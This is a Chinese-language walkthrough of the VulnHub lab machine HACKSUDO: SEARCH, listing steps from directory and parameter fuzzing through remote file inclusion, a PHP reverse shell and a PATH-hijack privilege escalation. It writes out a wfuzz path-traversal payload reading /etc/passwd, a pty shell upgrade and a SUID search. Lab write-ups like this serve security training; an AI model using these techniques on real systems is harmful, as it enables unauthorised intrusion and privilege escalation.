vulnhub刷题记录（HACKSUDO: SEARCH）

• 英文名称：HACKSUDO: SEARCH
• 中文名称：HACKSUDO：搜索
• 发布日期：2021年4月16日
• 难度：容易
• 描述：找到 user.txt 和 root.txt 标志，将其提交到 Discord 上的 mybox 频道，并有机会免费获得 hacksudo 机器黑客课程。
• 下载地址：https://www.vulnhub.com/entry/hacksudo-search,683/

ailx10

1951 次咨询

4.9

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

1、主机发现

主机发现

2、端口发现

端口发现

3、访问web主页

访问web主页

4、目录发现

dirsearch -u http://192.168.0.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --suffixes .php

目录发现

5、参数发现

wfuzz -u http://192.168.0.106/search1.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt 
wfuzz -u http://192.168.0.106/search1.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt --hw 288

参数发现

输出过滤

6、页面查看

页面查看

7、测试远程文件包含

测试远程文件包含

8、准备kali自带的php反弹shell

（1）在反弹shell目录下，启动http服务

启动http服务

（2）在kali上监听6666端口

在kali上监听6666端口

（3）页面访问，触发远程文件包含漏洞

触发远程文件包含漏洞

9、使用python 切换shell

python -c 'import pty;pty.spawn("/bin/bash")'

使用python 切换shell

10、搜寻系统用户信息

（1）查看用户

查看用户

（2）查看隐藏文件

查看隐藏文件

（3）尝试切换用户hacksudo

尝试切换用户hacksudo

11、获得hacksudo的flag

获得hacksudo的flag

12、查看敏感文件

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

查看敏感文件

13、发现具有setuid权限的程序

发现具有setuid权限的程序

14、伪造install，自定义环境变量

伪造install，自定义环境变量

15、提权

提权

实验完成～